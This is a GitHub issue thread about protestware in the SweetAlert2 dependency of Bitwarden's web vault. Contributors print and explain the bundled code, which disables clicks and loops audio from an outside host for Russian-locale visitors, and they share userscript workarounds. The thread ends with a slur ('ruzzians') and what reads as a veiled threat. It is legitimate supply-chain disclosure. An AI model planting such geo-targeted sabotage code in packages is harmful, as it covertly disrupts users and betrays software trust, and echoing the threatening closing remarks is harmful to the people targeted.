bitwarden / clients

Bitwarden client apps (web, browser extension, desktop, and cli).
https://bitwarden.com

SweetAlert2 loads Ukraine anthem #5734

Closed DarkCat09 closed 1 year ago

DarkCat09 commented 1 year ago

Steps To Reproduce

SweetAlert2 loads ukraine anthem if browser language is set to Russian or web vault is hosted on RU/РФ domain.
It is used as dependency: https://github.com/bitwarden/clients/blob/master/package.json#L198

See also https://github.com/dani-garcia/bw_web_builds/issues/132

I've downloaded the latest release of web vault and checked with grep:

$ grep -i -o -r ukraina.mp3 build/
build/app/vendor.d6556a6abd8a862bb28c.js.map:Ukraina.mp3
build/app/vendor.d6556a6abd8a862bb28c.js:Ukraina.mp3

Expected Result

Expected Result: no politics.

Actual Result

Actual Result: error while loading ukraine anthem in DevTools console.

Screenshots or Videos

No response

Additional Context

No response

Operating System

Linux

Operating System Version

No response

Web Browser

Firefox

Browser Version

No response

Build Version

v2023.5.1

Issue Tracking Info

DarkCat09 commented 1 year ago

I've read the conversation in https://github.com/bitwarden/clients/pull/5011 and the related issue https://github.com/bitwarden/clients/issues/4540, and now I don't think that developers will do anything...

atjbramley commented 1 year ago

Hi @DarkCat09,

This has been escalated for further investigation. If you have more information that can help us, please add it below.

Thanks!

Tipoff4317 commented 1 year ago

https://github.com/sweetalert2/sweetalert2/commits/c4dd5dcaf08e24c334f4ce62079d3234f193b2d9/README.md

DarkCat09 commented 1 year ago

@atjbramley,

Thanks for your quick response.

If you are not going to use another JavaScript library, take a look at https://github.com/lofcz/sweetalert2-neutral

Hinton commented 1 year ago

Hi @DarkCat09,

I've looked into the issue, and Bitwarden does not use a vulnerable version of SweetAlert2. We've intentionally not upgraded to newer major versions to avoid this issue.

I took a quick look at VaultWarden's build process, and they run npm audit --fix which seems to bump SweetAlert2 to a new major version. Since Bitwarden does not provide support for unofficial builds this issue will be closed.

DarkCat09 commented 1 year ago

@Hinton,

Really? I've checked the latest web vault release now:

$ wget https://github.com/bitwarden/clients/releases/download/web-v2023.5.1/web-2023.5.1-selfhosted-open-source.zip
...
2023-07-06 12:02:55 (101 KB/s) - «web-2023.5.1-selfhosted-open-source.zip» сохранён [10593568/10593568]

$ 7z x web-2023.5.1-selfhosted-open-source.zip

7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
p7zip Version 17.04 (locale=ru_RU.UTF-8,Utf16=on,HugeFiles=on,64 bits,12 CPUs x64)

Scanning the drive for archives:
1 file, 10593568 bytes (11 MiB)

Extracting archive: web-2023.5.1-selfhosted-open-source.zip
--
Path = web-2023.5.1-selfhosted-open-source.zip
Type = zip
Physical Size = 10593568

Everything is Ok

Folders: 75
Files: 226
Size:       41831531
Compressed: 10593568

$ cd build
$ grep -ior ukraina.mp3 .
./app/vendor.d6556a6abd8a862bb28c.js.map:Ukraina.mp3
./app/vendor.d6556a6abd8a862bb28c.js:Ukraina.mp3
$ more ./app/vendor.d6556a6abd8a862bb28c.js
/Ukraina.mp3  (slash is "find" command)
if("undefined"!=typeof window&&/^ru\b/.test(navigator.language)&&location.host.match(/\.(ru|su|xn--p1ai)$/)){var pi=new Date,mi=localStorage.getItem("swal-initiation");mi?(pi.getTime()-Date.parse(mi))/864e5>3&&setTimeout((function(){document.body.style.pointerEvents="none";var e=document.createElement("audio");e.src="https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",e.loop=!0,document.body.appendChild(e),setTimeout((function(){e.play().catch((function(){}))}),2500)}),500)

Maybe your CI/CD system also updates packages?

DarkCat09 commented 1 year ago

Here is the SHA256 sum of the release file I downloaded:

d918f0f8cbddc398353dddaac7821322fba4f33c722c8821a8c9132e6df53f57  web-2023.5.1-selfhosted-open-source.zip

DarkCat09 commented 1 year ago

SweetAlert2 10.16.1 specified in package.json was released before 24.02.2022, so there should be no malicious code. But there is (at least, in the pre-built web vault).

DarkCat09 commented 1 year ago

GitHub Actions build-web config:

https://github.com/bitwarden/clients/blob/db2427e05c46c0ba5f77cacebba2c82c7c3b2421/.github/workflows/build-web.yml#L73-L76

https://github.com/bitwarden/clients/blob/db2427e05c46c0ba5f77cacebba2c82c7c3b2421/.github/workflows/build-web.yml#L122-L124


Build command in apps/web/package.json:

https://github.com/bitwarden/clients/blob/db2427e05c46c0ba5f77cacebba2c82c7c3b2421/apps/web/package.json#L18

DarkCat09 commented 1 year ago

That's weird. Where does CI update packages?

Hinton commented 1 year ago

I took a second look and you are right, it seems the dependency was updated to a newer patch release recently which seems to bring in this issue. We're partially in the process of replacing SweetAlert2 with our own dialogs already though.

InvisibleRain commented 1 year ago

Any progress on fixing this vulnerability?

DarkCat09 commented 1 year ago

@Hinton, I'm sorry to bother you, but could I ask if there is any progress?

I still see swal2 in package(-lock).json, grep still finds "ukraina.mp3" in the latest web vault build.

If rewriting the UI to custom dialogs takes much time, why not use npm i sweetalert2-neutral for now?

I moved to KeePassXC + Syncthing, because I didn't want to wait for the fix and realized that serverless password storage is more secure. But I just want to be sure that Bitwarden supports neither Ukraine nor Russia, so I'll be glad to hear about updates on removing sweetalert2.

Upd: thanks a lot for reacting. I've subscribed to PR discussion.

sguryev commented 1 year ago

It has taken 2 months to remove MIR options (request: https://github.com/bitwarden/clients/pull/5011 and PR: https://github.com/bitwarden/clients/issues/4540). 2 months have passed for this issue to remove the Ukraine anthem 🤞🏼

lukateras commented 1 year ago

@DarkCat09 Thank you for digging into this Andrey! :3

Here's the formatted version of the snippet in question as of v2023.5.1:

if ("undefined" != typeof window && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|xn--p1ai)$/)) {
    var pi = new Date,
        mi = localStorage.getItem("swal-initiation");

    // If more than three days (864e5 ms per day) have passed since SweetAlert2
    // first recorded the origin in localStorage...
    // https://developer.mozilla.org/docs/Glossary/Origin
    mi ? (pi.getTime() - Date.parse(mi)) / 864e5 > 3 && setTimeout((function() {
        document.body.style.pointerEvents = "none";
        var e = document.createElement("audio");
        e.src = "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",
        e.loop = !0,
        document.body.appendChild(e), setTimeout((function() {
            e.play().catch((function() {}))
        }), 2500)
    }), 500) : /* ... */ null
}

Compare to: https://github.com/sweetalert2/sweetalert2/blob/v11.6.13/src/SweetAlert.js#L261-L281

Gist: https://gist.github.com/yanalunaterra/1adaf6173f13875cbd49303009f4ef31

sguryev commented 1 year ago

Does it mean that workaround is to block flag-gimn.ru domain completely and ignore console errors and missing alerts?

DarkCat09 commented 1 year ago

@sguryev, also, you need to start a script that reverses pointerEvents = "none", i.e.

window.addEventListener('load', () => { document.body.style.pointerEvents = "auto" })

But I hope this will be fixed soon.

lukateras commented 1 year ago

@sguryev Try this:

// ==UserScript==
// @name     SweetAlert2 protestware workaround
// @version  1
// @match    *://*.ru/*
// @match    *://*.su/*
// @match    *://*.by/*
// @match    *://*.xn--p1ai/*
// ==/UserScript==

// Tested against v11.7.27:
// https://github.com/sweetalert2/sweetalert2/blob/v11.7.27/src/SweetAlert.js#L261-L285

const observer = new MutationObserver(function(records, _) {
  for (const record of records) {
    for (const node of record.addedNodes) {
      if (node.src === "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3") {
        document.body.style.removeProperty("pointer-events");
        node.pause();
        node.src = "";
        node.remove();
      }
    }
  }
});

observer.observe(document.body, { childList: true });

Here's how to use it: https://github.com/awesome-scripts/awesome-userscripts#how-to-use

(;

lukateras commented 1 year ago

v2023.5.0 is the earliest release affected.

willmartian commented 1 year ago

We're in the final stages of getting this dependency fully removed for the September release.

limonte commented 1 year ago

Thank you for years of using my small plugin ❤️ and apologies for bringing this hassle to your project.

I hope to see one day that Bitwarden Inc. stands with Ukraine (something similar to this). Not restricting your service to ruzzians might negatively affect the reputation of the business.

Sincerely, happy Bitwarden user, this repo contributor, and the author of @sweetalert2

sguryev commented 1 year ago

@limonte

Not restricting your service to ruzzians might negatively affect the reputation of the business.

Is it the threat?

reysonk commented 1 year ago

Not restricting your service to ruzzians might negatively affect the reputation of the business.

Look around when you walk in the evenings.